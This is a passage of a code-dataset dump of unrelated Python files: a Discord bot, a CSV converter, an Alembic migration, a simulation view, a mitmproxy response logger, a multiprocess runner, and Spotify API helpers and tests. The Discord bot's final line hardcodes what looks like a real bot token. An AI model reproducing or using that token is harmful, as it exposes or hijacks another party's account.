em3.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.send_message(discord.Object(channel_id), embed=em3)\n print (bcolors.WARNING + \n (time.strftime(\"%d/%m/%Y %H:%M:%S\")) + \n bcolors.ENDC, \":\", bcolors.WARNING + (\"{}\").format(author.name) + \n bcolors.ENDC, \"a appelé un admin dans\", bcolors.WARNING + (\"#{}\".format(message.channel.name)) + \n bcolors.ENDC, \"avec succès sur le serveur : \", bcolors.WARNING + message.server.name + bcolors.ENDC)\n else:\n em2 = discord.Embed(title=\"Salon d'administration non trouvé..\", \n description=(\"Le bot a besoin d'un salon **administration_bot** pour fonctionner correctement..\\n\"\n \"Si vous en avez déjà créé un, vérifier que vous l'avez bien orthographié. 
\"), colour=0xe74c3c)\n em2.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em2)\n \n@bot.command(pass_context=True)\nasync def ping(ctx):\n cmd_str = \"!ping\"\n message = ctx.message\n author = message.author\n await bot.send_typing(message.channel)\n ping_FR = os.popen(\"ping -c 5 www.google.fr | tail -1| awk '{print $4}' | cut -d '/' -f 2\").read()\n ping_FR = str(ping_FR)\n em = discord.Embed(title=\"Le serveur a \" + ping_FR + \"ms de ping vers Google France\", colour=0x3498db)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n command_logs(cmd_str, author, message)\n\n@bot.command(pass_context=True)\nasync def frankyonmyserver(ctx):\n cmd_str = \"!frankyonmyserver\"\n message = ctx.message\n author = message.author\n# await bot.say(\"En cours de dévellopement...\")\n command_logs(cmd_str, author, message)\n em = discord.Embed(title='Franky sur votre serveur !', \n description=(\"Pour ajouter Franky a votre serveur, cliquez \"\n \"**[sur ce lien !](https://discordapp.com/oauth2/authorize?client_id=314031841642414080&scope=bot&permissions=8)**\"), colour=0x43b581)\n em.set_footer(text=time.strftime(\"Le %d/%m/%Y à %H:%M:%S\"))\n await bot.say(embed=em)\n\nbot.run('MzE0MDMxODQxNjQyNDE0MDgw.C_yVEQ.W46qusFYjg9-sE2QWzBexfxtvJM')","sub_path":"Franky.py","file_name":"Franky.py","file_ext":"py","file_size_in_byte":16279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"387375415","text":"import csv\nimport json\n\nf =open('Names.csv', 'r')\nreader = csv.reader(f)\ncar = []\nfirstline=True\nfor row in reader:\n if firstline: #First line we will get the header\n firstline=False\n header =[] #Get header of csv file into list########\n for x in row:\n if x : \n header.append(x)\n else:\n break\n continue ###########################################\n \n if not row: #ignore if row empty\n continue\n \n entry = {}\n n = 0\n for field in header:\n entry[field] = row[n]\n n=n+1\n car.append(entry) #append dict into list\n\nprint(header)\nprint(car) #printing list\nwith open('car.json', 'w') as outfile:\n json.dump(car,outfile)","sub_path":"csv_dict_conversion/csv_to_dict.py","file_name":"csv_to_dict.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"241020595","text":"\"\"\"add is_adult_only to topic\n\nRevision ID: 493b84715c67\nRevises: b4364f33391d\nCreate Date: 2018-04-23 17:38:12.708166\n\n\"\"\"\nimport os\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nschema_name = os.getenv('SCHEMA_NAME')\n\n\n# revision identifiers, used by Alembic.\nrevision = '493b84715c67'\ndown_revision = 'b4364f33391d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n with op.batch_alter_table(\"topic\", schema=schema_name) as batch_op:\n batch_op.add_column(\n sa.Column('is_adult_only', sa.Boolean, server_default='False'))\n\n\ndef downgrade():\n with op.batch_alter_table(\"topic\", schema=schema_name) as batch_op:\n batch_op.drop_column('is_adult_only')\n","sub_path":"alembic/versions/493b84715c67_add_is_adult_only_to_topic.py","file_name":"493b84715c67_add_is_adult_only_to_topic.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"421744005","text":"# simu - Robot simulation. 
{{{\n#\n# Copyright (C) 2009 Nicolas Schodet\n#\n# APBTeam:\n# Web: http://apbteam.org/\n# Email: team AT apbteam DOT org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n# }}}\n\"\"\"AquaJim bridge.\"\"\"\nfrom simu.inter.drawable import Drawable\nfrom math import pi, cos, sin\n\nfrom simu.view.table_eurobot2009 import puck_attr\n\nclass Bridge (Drawable):\n\n width = 220\n height = 100\n\n def __init__ (self, onto, model):\n Drawable.__init__ (self, onto)\n self.model = model\n self.model.register (self.update)\n\n def draw (self):\n self.reset ()\n self.trans_rotate (0.95 * pi / 2)\n self.draw_line ((-40, -80), (-40, 80), fill = '#808080')\n self.draw_line ((40, -80), (40, 80), fill = '#808080')\n for i in range (2):\n puck = self.model.bridge_slot[i]\n if puck is not None:\n self.draw_circle ((0, 40 - 80 * i), 35,\n **puck_attr[puck.color])\n if self.model.bridge_door_servo_value is not None:\n self.draw_arc ((0, -40), 37.5, start = -3 * pi / 4\n + self.model.bridge_door_servo_value * pi, extent = pi / 2)\n if self.model.bridge_finger_servo_value is not None:\n self.draw_arc ((-40, -50), 50, start = pi / 2, extent = -3 * pi / 4,\n style = 'arc', outline = '#c0c0c0')\n a = pi / 2 - self.model.bridge_finger_servo_value * 3 * pi / 4\n self.draw_line ((-40, -50), (-40 + 50 * cos (a), -50 + 50 * sin (a)))\n\n","sub_path":"host/simu/robots/aquajim/view/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"647778065","text":"# -*- coding: utf-8 -*-\nimport mitmproxy.http\nimport json\n\n\n# # image = sys.argv[1]\n# runlist = [\n# request.HandleRequest().modify_request(),\n# response.HandleResponse().get_response()\n# ]\n\n# def get_response(flow: mitmproxy.http.HTTPFlow):\n# url = 'http://' + flow.request.host + '/kssearch/submit/oralevaluatesearch'\n# if flow.request.url.startswith(url):\n# print(\"================================正确的呀=========================================\")\n#\n# # 读取测试图片\n# # imagepath = open(r\"../util/testimage.txt\", 'rU').readlines()\n# # path = os.path.dirname(os.path.realpath(__file__))\n# # complete_path = os.path.join(path, imagepath)\n# # picname = os.path.basename(complete_path)\n# # file = open(complete_path, 'rb')\n# # files = {'image': (picname, file, \"application/octet-stream\", {\"Content-Transfer-Encoding\": \"8bit\"})}\n# # flow.request.query.update({\"image\": files})\n# # print(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\" + flow.request.query)\n# # print(\"request\" + imagepath)\n# # print(type(imagepath))\n#\n# # 写入接口返回的图片信息\n# text = flow.response.text\n# data_json = json.loads(text)\n# print(\"脚本\")\n# if data_json.get('data'):\n# imginfo = data_json.get('data').get('imageInfo')\n# with open('.\\\\queryinfo.txt', 'a+') as f:\n# 
f.truncate()\n# print(\"image\")\n# print(str(imginfo))\n# f.write(str(imginfo) + '\\n')\n# f.close()\n#\n# # 写入接口返回的框选坐标\n# if data_json.get('data').get('questionList'):\n# datas = data_json.get('data').get('questionList')\n# with open('.\\\\coordinate.txt', 'w') as f:\n# f.truncate()\n# for data in datas:\n# exptype = data.get('expType')\n# questionType = data.get('questionType')\n# if ((questionType == 1) and (exptype == 2)) or questionType == 2:\n# print(type(data.get('coordinate')))\n# print(data.get('coordinate'))\n# coordinate = data.get('coordinate')\n# f.write(str(coordinate) + '\\n')\n# f.close()\n#\n# # data = json.dumps(text)\n#\n# # ctx.log.info(str(result))\n# else:\n# print(\"else la else la else la else la else la else la else la else la else la else la else la \")\n\n# 所有发出的请求数据包都会被这个方法所处理\n# 所谓的处理,我们这里只是打印一下一些项;当然可以修改这些项的值直接给这些项赋值即可\n# def request(flow):\n# # 获取请求对象\n# request = flow.request\n# # 实例化输出类\n# info = ctx.log.info\n# # 打印请求的url\n# info(request.url)\n# # 打印请求方法\n# info(request.method)\n# # 打印host头\n# info(request.host)\n# # 打印请求端口\n# info(str(request.port))\n# # 打印所有请求头部\n# info(str(request.headers))\n# # 打印cookie头\n# info(str(request.cookies))\n\n# 所有服务器响应的数据包都会被这个方法处理\n# 所谓的处理,我们这里只是打印一下一些项\n# def response(flow):\n# # 获取响应对象\n# response = flow.response\n# # 实例化输出类\n# info = ctx.log.info\n# # 打印响应码\n# info(str(response.status_code))\n# # 打印所有头部\n# info(str(response.headers))\n# # 打印cookie头部\n# info(str(response.cookies))\n# # 打印响应报文内容\n# info(str(response.text))\n\n\n# 设置上游代理\n# def request(self, flow: mitmproxy.http.HTTPFlow):\n# if flow.request.method == \"CONNECT\":\n# return\n# if flow.live:\n# proxy = ('http://121.228.53.238', '9990')\n# print(flow.request.host)\n# flow.live.change_upstream_proxy_server(proxy)\n# str = 'cmd.exe mitmdump -s ./pyscript.py - p 8080'\n# d = os.system('mitmdump')\n# print(d)\n# mitmproxy.mitmdump(str)\n# os.system('mitmweb -s proxyscript.py -p 8082')\n\ndef response(flow: mitmproxy.http.HTTPFlow):\n url = 'http://' + flow.request.host + '/kssearch/submit/oralevaluatesearch'\n if flow.request.url.startswith(url):\n print(\"正确的呀\")\n text = flow.response.text\n data_json = json.loads(text)\n print(\"脚本\")\n if data_json.get('data'):\n imginfo = data_json.get('data').get('imageInfo')\n with open('.\\\\conf\\\\queryinfo.txt', 'w') as f:\n f.truncate()\n print(\"image\")\n print(str(imginfo))\n f.write(str(imginfo) + '\\n')\n f.close()\n if data_json.get('data').get('questionList'):\n datas = data_json.get('data').get('questionList')\n with open('.\\\\conf\\\\coordinate.txt', 'w') as f:\n f.truncate()\n for data in datas:\n exptype = data.get('expType')\n questionType = data.get('questionType')\n if ((questionType == 1) and (exptype == 2)) or questionType == 2:\n print(type(data.get('coordinate')))\n print(data.get('coordinate'))\n coordinate = data.get('coordinate')\n f.write(str(coordinate) + '\\n')\n f.close()\n\n # data = json.dumps(text)\n\n # ctx.log.info(str(result))\n else:\n print(\"else la else la else la else la else la else la else la else la else la else la else la \")\n","sub_path":"AutoUIks/mitmproxyscript.py","file_name":"mitmproxyscript.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"6677552","text":"import torch.multiprocessing as mp\nimport threading\nimport queue\nimport atexit\nimport bisect\nfrom typing import Callable, Iterable, Any\nfrom easycore.common.config import CfgNode as CN\n\n\nclass BaseRunner:\n 
\"\"\"\n    A multi-process runner whose consumer receives data in no particular order.\n    The runner starts multiple producer processes and one consumer thread.\n    \"\"\"\n\n    class _Producer(mp.Process):\n        class _StopToken:\n            # sentinel telling a producer process to shut down\n            pass\n\n        def __init__(self,\n                     input_queue,\n                     output_queue,\n                     device,\n                     cfg,\n                     init_func,\n                     work_func,\n                     end_func):\n            super(BaseRunner._Producer, self).__init__()\n            self.input_queue = input_queue\n            self.output_queue = output_queue\n            self.device = device\n            self.cfg = cfg.copy()\n            self.init_func = init_func\n            self.work_func = work_func\n            self.end_func = end_func\n\n        def run(self):\n            raise NotImplementedError(\"This is a base runner; subclasses must implement run().\")\n\n    class _Consumer(threading.Thread):\n        class _InitToken:\n            # sentinel telling the consumer to run its init function\n            pass\n\n        class _EndToken:\n            # sentinel telling the consumer to finalize and emit its result\n            pass\n\n        class _StopToken:\n            # sentinel telling the consumer thread to shut down\n            pass\n\n        def __init__(self,\n                     receive_func,\n                     input_queue,\n                     output_queue,\n                     cfg,\n                     init_func,\n                     work_func,\n                     end_func):\n            super(BaseRunner._Consumer, self).__init__(daemon=True)\n            self.receive_func = receive_func\n            self.input_queue = input_queue\n            self.output_queue = output_queue\n            self.cfg = cfg.copy()\n            self.init_func = init_func\n            self.work_func = work_func\n            self.end_func = end_func\n\n        def run(self):\n            raise NotImplementedError(\"This is a base runner; subclasses must implement run().\")\n\n    def __init__(self,\n                 devices,\n                 cfg = CN(),\n                 queue_scale = 3.0):\n        \"\"\"\n        Args:\n            devices (int or Iterable): If `devices` is an `int`, it will use that many cpu devices to do\n                the work. If `devices` is an iterable object, such as a list, it will use the\n                devices specified by the iterable object, such as [\"cpu\", \"cuda:0\", \"cuda:1\"].\n            cfg (easycore.common.config.CfgNode): user custom data.\n            queue_scale (float): scale the queues for communication between processes.\n        \"\"\"\n        # get devices\n        if isinstance(devices, int):\n            self.devices = [\"cpu\" for _ in range(devices)]\n        elif isinstance(devices, Iterable):\n            self.devices = devices\n        else:\n            raise Exception(\"parameter `devices` must be int or Iterable.\")\n\n        self.cfg = cfg\n        self.queue_scale = queue_scale\n\n        self._is_activate = False\n        self.activate()\n        \n        atexit.register(self.close)\n\n    @property\n    def is_activate(self):\n        \"\"\" whether the runner is alive.
\"\"\"\n        return self._is_activate\n\n    @staticmethod\n    def producer_init(device, cfg):\n        \"\"\"\n        function for producer initialization.\n\n        Args:\n            device (str): device for this process.\n            cfg (easycore.common.config.CfgNode): config of this process, you can use it to transfer data\n                to the `producer_work` and `producer_end` functions.\n        \"\"\"\n        pass\n\n    @staticmethod\n    def producer_work(device, cfg, data):\n        \"\"\"\n        function specifying how the producer processes the data.\n\n        Args:\n            device (str): device for this process.\n            cfg (easycore.common.config.CfgNode): config of this process, you can use it to get data from\n                the `producer_init` function and transfer data to the next `producer_work` and `producer_end`\n                calls.\n            data (Any): data taken from the input of the `__call__` method.\n\n        Returns:\n            Any: processed data\n        \"\"\"\n        return data\n\n    @staticmethod\n    def producer_end(device, cfg):\n        \"\"\"\n        function called after a producer finishes all of its tasks and before its process closes.\n\n        Args:\n            device (str): device for this process.\n            cfg (easycore.common.config.CfgNode): config of this process, you can use it to get data\n                from the `producer_init` and `producer_work` functions.\n        \"\"\"\n        pass\n\n    @staticmethod\n    def consumer_init(cfg):\n        \"\"\"\n        function for consumer initialization.\n\n        Args:\n            cfg (easycore.common.config.CfgNode): config of this process, you can use it to transfer data\n                to the `consumer_work` and `consumer_end` functions.\n        \"\"\"\n        pass\n\n    @staticmethod\n    def consumer_work(cfg, data):\n        \"\"\"\n        function specifying how the consumer processes the data from producers.\n\n        Args:\n            cfg (easycore.common.config.CfgNode): config of this process, you can use it to get data from\n                the `consumer_init` function and transfer data to the next `consumer_work` and `consumer_end`\n                calls.\n        \"\"\"\n        pass\n\n    @staticmethod\n    def consumer_end(cfg):\n        \"\"\"\n        function called after the consumer has received all data from the producers.\n\n        Args:\n            cfg (easycore.common.config.CfgNode): config of this process, you can use it to get data from\n                the `consumer_work` function.\n\n        Returns:\n            Any: processed data\n        \"\"\"\n        return None\n\n    def __call__(self, data_iter):\n        \"\"\"\n        Args:\n            data_iter (Iterable): iterator of data\n\n        Returns:\n            Any: result\n        \"\"\"\n        if not self.is_activate:\n            raise Exception(\"The runner is closed.
Please activate it.\")\n\n # inform the consumer to initialize\n self._put_into_consumer(self._Consumer._InitToken())\n\n # put data to producer\n for data in data_iter:\n self._put_into_producer(data)\n self._put_into_consumer(None) # inform the consumer to process 1 data\n\n # inform the consumer to return result\n self._put_into_consumer(self._Consumer._EndToken())\n\n # get result from consumer\n data = self._get_from_consumer()\n return data\n\n def __del__(self):\n self.close()\n\n def close(self):\n \"\"\"\n Shutdown all processes if this runner is alive.\n \"\"\"\n if self.is_activate:\n self._is_activate = False\n # stop workers\n for _ in self.devices:\n self.producer_input_queue.put(self._Producer._StopToken())\n self.consumer_input_queue.put(self._Consumer._StopToken())\n\n # join workers\n for producer in self.producers:\n producer.join()\n self.consumer.join()\n\n # delete resources\n del self.producer_input_queue\n del self.producer_output_queue\n del self.consumer_input_queue\n del self.consumer_output_queue\n del self.producers\n del self.consumer\n\n\n def activate(self):\n \"\"\"\n Restart all processes if this runner is closed.\n \"\"\"\n if not self.is_activate:\n self._is_activate = True\n # init queues for communication between processes\n self.producer_input_queue = mp.Queue(maxsize = int(len(self.devices) * self.queue_scale))\n self.producer_output_queue = mp.Queue(maxsize = int(len(self.devices) * self.queue_scale))\n self.consumer_input_queue = queue.Queue(maxsize = int(len(self.devices) * self.queue_scale))\n self.consumer_output_queue = queue.Queue(maxsize = 1)\n\n # create workers\n self.producers = []\n for device in self.devices:\n self.producers.append(\n self._Producer(\n self.producer_input_queue,\n self.producer_output_queue,\n device,\n self.cfg,\n self.producer_init,\n self.producer_work,\n self.producer_end))\n self.consumer = self._Consumer(\n self._get_from_producer,\n self.consumer_input_queue,\n self.consumer_output_queue,\n self.cfg,\n self.consumer_init,\n self.consumer_work,\n self.consumer_end)\n\n # start workers\n for producer in self.producers:\n producer.start()\n self.consumer.start()\n\n\n def _put_into_producer(self, data):\n self.producer_input_queue.put(data)\n \n def _get_from_producer(self):\n return self.producer_output_queue.get()\n\n def _put_into_consumer(self, data):\n self.consumer_input_queue.put(data)\n \n def _get_from_consumer(self):\n data = self.consumer_output_queue.get()\n self.consumer_output_queue.task_done()\n return data\n\n\n\nclass UnorderedRunner(BaseRunner):\n \"\"\"\n A Multi-process runner whose consumer receive data in unorder. 
\n The runner will start multi-processes for producers and 1 thread for consumer.\n \"\"\"\n class _Producer(BaseRunner._Producer):\n def run(self):\n # initialization\n self.init_func(self.device, self.cfg)\n\n while True:\n data = self.input_queue.get()\n if isinstance(data, self._StopToken):\n break\n\n # decode data and do task\n data = self.work_func(self.device, self.cfg, data)\n\n self.output_queue.put(data)\n\n # end\n self.end_func(self.device, self.cfg)\n\n\n class _Consumer(BaseRunner._Consumer):\n def run(self):\n while True:\n data = self.input_queue.get()\n self.input_queue.task_done()\n if isinstance(data, self._StopToken):\n break\n elif isinstance(data, self._InitToken):\n # initialization\n cfg = self.cfg.copy()\n self.init_func(cfg)\n elif isinstance(data, self._EndToken):\n # end\n data = self.end_func(cfg)\n self.output_queue.put(data)\n del cfg\n else:\n # work\n data = self.receive_func()\n self.work_func(cfg, data)\n\n\n def __init__(self,\n devices,\n cfg = CN(),\n queue_scale = 3.0):\n \"\"\"\n Args:\n devices (int or Iterable): If the `devices` is `int`, it will use devices cpu to do\n the work. If the `devices` is an iterable object, such as list, it will use the\n devices specified by the iterable object, such as [\"cpu\", \"cuda:0\", \"cuda:1\"].\n cfg (easycore.common.config.CfgNode): user custom data.\n queue_scale (float): scale the queues for communication between processes.\n \"\"\"\n super(UnorderedRunner, self).__init__(devices, cfg=cfg, queue_scale=queue_scale)\n\n\n\nclass OrderedRunner(BaseRunner):\n \"\"\" \n A Multi-process runner whose consumer receive data in order. \n The runner will start multi-processes for producers and 1 thread for consumer.\n \"\"\"\n class _Producer(BaseRunner._Producer):\n def run(self):\n # initialization\n self.init_func(self.device, self.cfg)\n\n while True:\n data = self.input_queue.get()\n if isinstance(data, self._StopToken):\n break\n\n # decode data and do task\n id, data = data\n data = self.work_func(self.device, self.cfg, data)\n\n self.output_queue.put((id, data))\n\n # end\n self.end_func(self.device, self.cfg)\n\n\n class _Consumer(BaseRunner._Consumer):\n def run(self):\n while True:\n data = self.input_queue.get()\n self.input_queue.task_done()\n if isinstance(data, self._StopToken):\n break\n elif isinstance(data, self._InitToken):\n # initialization\n cfg = self.cfg.copy()\n self.init_func(cfg)\n elif isinstance(data, self._EndToken):\n # end\n data = self.end_func(cfg)\n self.output_queue.put(data)\n del cfg\n else:\n data = self.receive_func()\n self.work_func(cfg, data)\n\n def __init__(self,\n devices,\n cfg = CN(),\n queue_scale = 3.0):\n \"\"\"\n Args:\n devices (int or Iterable): If the `devices` is `int`, it will use devices cpu to do\n the work. 
If the `devices` is an iterable object, such as list, it will use the\n devices specified by the iterable object, such as [\"cpu\", \"cuda:0\", \"cuda:1\"].\n cfg (easycore.common.config.CfgNode): user custom data.\n queue_scale (float): scale the queues for communication between processes.\n \"\"\"\n super(OrderedRunner, self).__init__(devices, cfg=cfg, queue_scale=queue_scale)\n\n\n def close(self):\n \"\"\"\n Shutdown all processes if this runner is alive.\n \"\"\"\n if self.is_activate:\n del self._put_id, self._get_id\n del self._id_buffer, self._data_buffer\n\n super(OrderedRunner, self).close()\n\n def activate(self):\n \"\"\"\n Restart all processes if this runner is closed.\n \"\"\"\n if not self.is_activate:\n self._put_id = 0\n self._get_id = 0\n self._id_buffer = []\n self._data_buffer = []\n\n super(OrderedRunner, self).activate()\n\n def _put_into_producer(self, data):\n id = self._put_id\n self._put_id += 1\n self.producer_input_queue.put((id, data))\n \n def _get_from_producer(self):\n if len(self._id_buffer) and self._id_buffer[0] == self._get_id:\n data = self._data_buffer[0]\n del self._id_buffer[0], self._data_buffer[0]\n self._get_id += 1\n return data\n\n while True:\n id, data = self.producer_output_queue.get()\n if id == self._get_id:\n self._get_id += 1\n return data\n insert_position = bisect.bisect(self._id_buffer, id)\n self._id_buffer.insert(insert_position, id)\n self._data_buffer.insert(insert_position, data)\n\n","sub_path":"easycore/torch/parallel/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":14997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"538198351","text":"# -*- coding: utf-8 -*-\n'''\nTesting file\n'''\n\n\n\nFIND_SETTINGS = {\n 'findWiFi': True,\n 'findWiFiNe': True,\n 'findWiFiPar': True,\n 'findWiFiHu': False,\n 'findWiFiWe': False,\n 'findBACnet': False,\n 'findModbus': False,\n 'findAcquiSuite': False,\n 'findWiFiNet': False,\n 'findSmartThings': False,\n 'findProteus': False,\n 'findWiFiIC': True,\n 'findWiFiHo': True,\n 'findZigBee': True\n\t\n}\n\nDUMMY_SETTINGS = {\n 'dummy_discovery': False,\n 'number_of_hvac': 30,\n 'number_of_lighting': 0,\n 'number_of_plugload': 0,\n 'number_of_sensor': 0,\n 'number_of_powermeter': 0\n}","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"551081181","text":"from requests.api import get\n\nfrom .models import SpotifyToken\nfrom django.utils import timezone\nfrom datetime import timedelta\nfrom .credentials import CLIENT_ID,CLIENT_SECRET\nfrom requests import post\n\nBASE_URL = \"https://api.spotify.com/v1/me/\"\n\n\ndef getToken(session_id): \n token= SpotifyToken.objects.filter(user=session_id)\n if token:\n return token[0]\n else:\n return None\ndef isSpotifyAuth(session_id): \n token= getToken(session_id)\n if token: \n if token.expires_in <= timezone.now():\n refreshToken(session_id=session_id) \n return True\n return False\n\ndef update_or_create_user_tokens(session_id, access_token, token_type, expires_in, refresh_token):\n tokens=getToken(session_id)\n expires_in = timezone.now() + timedelta(seconds=expires_in)\n\n if tokens:\n tokens.access_token = access_token\n tokens.refresh_token = refresh_token\n tokens.expires_in = expires_in\n tokens.token_type = token_type\n tokens.save(update_fields=['access_token',\n 'refresh_token', 'expires_in', 'token_type'])\n else:\n tokens = 
SpotifyToken.objects.create(user=session_id, access_token=access_token,\n                                    refresh_token=refresh_token, token_type=token_type, expires_in=expires_in)\n\n\n    \n\n\ndef refreshToken(session_id):\n    refresh_token = getToken(session_id).refresh_token\n    response = post('https://accounts.spotify.com/api/token', data={\n        'grant_type': 'refresh_token',\n        'refresh_token': refresh_token,\n        'client_id': CLIENT_ID,\n        'client_secret': CLIENT_SECRET\n    }).json()\n    access_token = response.get('access_token')\n    token_type = response.get('token_type')\n    expires_in = response.get('expires_in')\n    # Spotify may omit the refresh token in a refresh response; keep the old one in that case\n    refresh_token = response.get('refresh_token') or refresh_token\n    update_or_create_user_tokens(session_id, access_token=access_token, token_type=token_type, expires_in=expires_in, refresh_token=refresh_token)\n\ndef send_spotify_api_request(host, endpoint):\n    tokens = getToken(host)\n    headers = {'Content-Type': 'application/json',\n               'Authorization': \"Bearer \" + tokens.access_token}\n\n    response = get(BASE_URL + endpoint, {}, headers=headers)\n    try:\n        return response.json()\n    except ValueError:\n        return {'Error': 'Issue with request'}\n\n\n    ","sub_path":"spotify/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"625174507","text":"from flask import Blueprint, render_template, session,\\\n    request, g, url_for, redirect\n#from database_func import Item, HTMLText, get_lang, T_SearchHint, T_ItemAttrValue\nimport database_func as db\n#from blueprints import category as bp_category, user as bp_user, item as bp_item\nimport blueprints as bp\nfrom blueprints import user as bp_user\n\nblueprint = Blueprint('home', __name__)\n\ndef inject_this_context():\n    t = bp.user.get_base_html_texts()\n    t.update(bp.user.get_html_text('search_default', 'valid_start', 'valid_end', 'valid_period', 'yuan'))\n    \n    return dict(html_texts = t)\n    \n#blueprint.context_processor(inject_this_context)\n\n#from memory_profiler import profile, memory_usage\n#import io\n#fp=io.open('/vagrant/memory_profiler.log','w')\n#from memory_profiler import LogFile\n#import sys\n#sys.stdout = LogFile('memory_profile_log')\n#@profile(stream=fp, precision=6)\n@blueprint.route('/')\n#@bp_user.url_language_argument()\ndef home():\n    # print('request.path')\n    # print(request.path)\n    # print(request.referrer)\n    # print(session)\n    # print(request.url_root)\n    \n    #this_user = db.User.get_by_uuid('7113c00e468a4ec38d532d522c216ec4')\n    #source_user = db.User.get_by_uuid('7876fcbd16bc41249efe738d6d0bd5fb')\n    \n    #if this_user is not None and source_user is not None:\n    #    for i in source_user.identities:\n    #        i.uuid = this_user.uuid\n    #        i.merge()\n    \n    category_id = request.args.get('c', None)\n    \n    categories = []\n    # categories = bp.category.get_categories_for_display(p_category_id = category_id)\n    items = []\n    # items = db.Item.get_by_category(lang = g.l, category_id = category_id)\n    search_hints = []\n    # search_hints = db.T_SearchHint.get_all_available()\n    attr_values = {}\n    # attr_values = db.ItemAttrValue.get_by_items(items, g.l)\n    \n    #print request.user_agent\n    return render_template('home.html', title = '',\\\n        categories = categories,\\\n        items = [i.serialize for i in items],\\\n        search_hints = [ h.serialize for h in search_hints ],\\\n        attr_values = attr_values\n        )\n    \n@blueprint.route('/favicon.ico')\ndef favicon():\n    return redirect(url_for('static',
filename='favicon.ico'))\n","sub_path":"flask/blueprints/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"393381303","text":"from unittest import SkipTest\nfrom tests._cred import TestCaseWithUserCredentials\nfrom ._resources import playlist_id, artist_ids, user_ids\n\n\nclass TestSpotifyFollow(TestCaseWithUserCredentials):\n \"\"\"\n If current user follows the tested playlist, it is set as a private follow.\n \"\"\"\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n try:\n cls.current_playlist_follow = cls.client.playlist_is_following(\n playlist_id,\n [cls.current_user_id]\n )[0]\n cls.current_artist_follows = cls.client.artists_is_following(\n artist_ids\n )\n cls.current_user_follows = cls.client.users_is_following(\n user_ids\n )\n except Exception as e:\n raise SkipTest('State before tests could not be determined!') from e\n\n def test_playlist_follow(self):\n self.client.playlist_follow(playlist_id)\n\n def test_playlist_unfollow(self):\n self.client.playlist_unfollow(playlist_id)\n\n def test_followed_artists(self):\n self.client.followed_artists()\n\n def test_artists_follow(self):\n self.client.artists_follow(artist_ids)\n\n def test_artists_unfollow(self):\n self.client.artists_unfollow(artist_ids)\n\n def test_users_follow(self):\n self.client.users_follow(user_ids)\n\n def test_users_unfollow(self):\n self.client.users_unfollow(user_ids)\n\n @classmethod\n def tearDownClass(cls):\n if cls.current_playlist_follow:\n cls.client.playlist_follow(playlist_id, public=False)\n else:\n cls.client.playlist_unfollow(playlist_id)\n\n artist_follows = [\n a for i, a in enumerate(artist_ids)\n if cls.current_artist_follows[i]\n ]\n if artist_follows:\n cls.client.artists_follow(artist_follows)\n\n artist_unfollows = [\n a for i, a in enumerate(artist_ids)\n if not cls.current_artist_follows[i]\n ]\n if artist_unfollows:\n cls.client.artists_unfollow(artist_unfollows)\n\n user_follows = [\n u for i, u in enumerate(user_ids)\n if cls.current_user_follows[i]\n ]\n if user_follows:\n cls.client.users_follow(user_follows)\n\n user_unfollows = [\n u for i, u in enumerate(user_ids)\n if not cls.current_user_follows[i]\n ]\n if user_unfollows:\n cls.client.users_unfollow(user_unfollows)\n","sub_path":"tests/client/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"273153781","text":"#\n# Copyright (c) 2017 Advanced Micro Devices, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# 3. 
